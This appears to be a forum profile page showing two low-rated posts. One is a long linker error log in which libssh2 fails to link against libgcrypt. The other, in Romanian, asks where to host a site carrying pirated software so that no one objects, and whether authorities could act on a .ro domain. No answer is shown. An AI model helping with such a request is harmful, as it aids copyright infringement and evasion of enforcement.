/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x183): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x194): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x23d): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x248): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x253): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x25e): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x28e): undefined reference to `gcry_mpi_randomize' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x2a1): undefined reference to `gcry_mpi_powm' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x2aa): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x2b8): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x2d1): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x310): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x321): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o):(.text+0x334): more undefined references to `gcry_mpi_get_nbits' follow /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x359): undefined reference to `gcry_mpi_print' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x444): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x465): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x483): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x48f): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x4b7): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x576): undefined reference to `gcry_mpi_scan' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x5af): undefined reference to `gcry_mpi_powm' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x5b8): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x5c6): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x5e2): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x622): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x633): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o):(.text+0x642): more undefined references to `gcry_mpi_get_nbits' follow /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x66a): undefined reference to `gcry_mpi_print' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x67d): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x6b5): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x6d7): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x701): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x722): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x744): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o):(.text+0x75e): more undefined references to `gcry_md_write' follow /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x87e): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x89f): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x9fc): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xa08): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xa2f): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xa52): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xa6a): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xa7c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xa99): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xab0): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xae5): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xaf8): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xb1d): undefined reference to `gcry_mpi_print' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xccc): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xcd8): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xcff): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xd22): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xd3a): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xd4c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xd69): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xd80): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xddc): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xde8): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xe0e): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xe31): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xe49): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xe5d): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xe7a): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xe91): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xf8c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xf98): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xfbf): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xfe2): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0xffa): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x100c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1029): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1040): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x109c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x10a8): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x10ce): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x10f1): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1109): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x111d): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x113a): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1151): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1173): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x117f): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x119e): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x129c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x12a8): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x12cf): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x12f2): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x130a): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x131c): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1339): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1350): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1387): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1396): undefined reference to `gcry_mpi_get_nbits' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x13be): undefined reference to `gcry_mpi_print' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1578): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x158e): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x1610): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group1_sha1_key_exchange': (.text+0x16d8): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group1_sha1_key_exchange': (.text+0x16ef): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group1_sha1_key_exchange': (.text+0x1713): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group1_sha1_key_exchange': (.text+0x1721): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group1_sha1_key_exchange': (.text+0x1735): undefined reference to `gcry_mpi_set_ui' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group1_sha1_key_exchange': (.text+0x1753): undefined reference to `gcry_mpi_scan' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group_exchange_sha1_key_exchange': (.text+0x17b3): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group_exchange_sha1_key_exchange': (.text+0x17ca): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group_exchange_sha1_key_exchange': (.text+0x17f3): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group_exchange_sha1_key_exchange': (.text+0x1801): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group_exchange_sha1_key_exchange': (.text+0x1902): undefined reference to `gcry_mpi_scan' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group_exchange_sha1_key_exchange': (.text+0x1924): undefined reference to `gcry_mpi_scan' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group14_sha1_key_exchange': (.text+0x1a5e): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group14_sha1_key_exchange': (.text+0x1a75): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group14_sha1_key_exchange': (.text+0x1a93): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group14_sha1_key_exchange': (.text+0x1aa1): undefined reference to `gcry_mpi_new' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group14_sha1_key_exchange': (.text+0x1ab5): undefined reference to `gcry_mpi_set_ui' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `kex_method_diffie_hellman_group14_sha1_key_exchange': (.text+0x1ad3): undefined reference to `gcry_mpi_scan' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `_libssh2_kex_exchange': (.text+0x246b): undefined reference to `gcry_randomize' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0x79): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0x8b): undefined reference to `gcry_md_setkey' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0x9f): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0xaf): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0xbe): undefined reference to `gcry_md_get_algo' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0xc5): undefined reference to `gcry_md_get_algo_dlen' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0xd3): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0xea): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_ripemd160_hash': (.text+0x125): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x179): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x18b): undefined reference to `gcry_md_setkey' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x19f): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x1af): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x1be): undefined reference to `gcry_md_get_algo' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x1c5): undefined reference to `gcry_md_get_algo_dlen' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x1d3): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x1ea): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_md5_hash': (.text+0x225): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x2d9): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x2eb): undefined reference to `gcry_md_setkey' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x2ff): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x30f): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x31e): undefined reference to `gcry_md_get_algo' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x325): undefined reference to `gcry_md_get_algo_dlen' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x333): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x34a): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(mac.o): In function `mac_method_hmac_sha1_hash': (.text+0x385): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(crypt.o): In function `crypt_dtor': (.text+0x1e): undefined reference to `gcry_cipher_close' collect2: error: ld returned 1 exit status
    -1 points
  20. Am o intrebare poate simpla pentru unii dar vreau sa fiu pe deplin lamurit. Sa zicem ca vreau sa deschid un site, domeniul o sa fie .com sau .net, ce hosting trebuie sa caut in ce tara in asa fel incat sa nu imi comenteze nimeni de continut, sa zicem ca ar fi programe piratate, etc. In cazul in care domeniul este .ro, dar hostingul este "undeva unde nu ar zice nimeni nimic" se pot sesiza cei de la minister ?
    -1 points
×
×
  • Create New...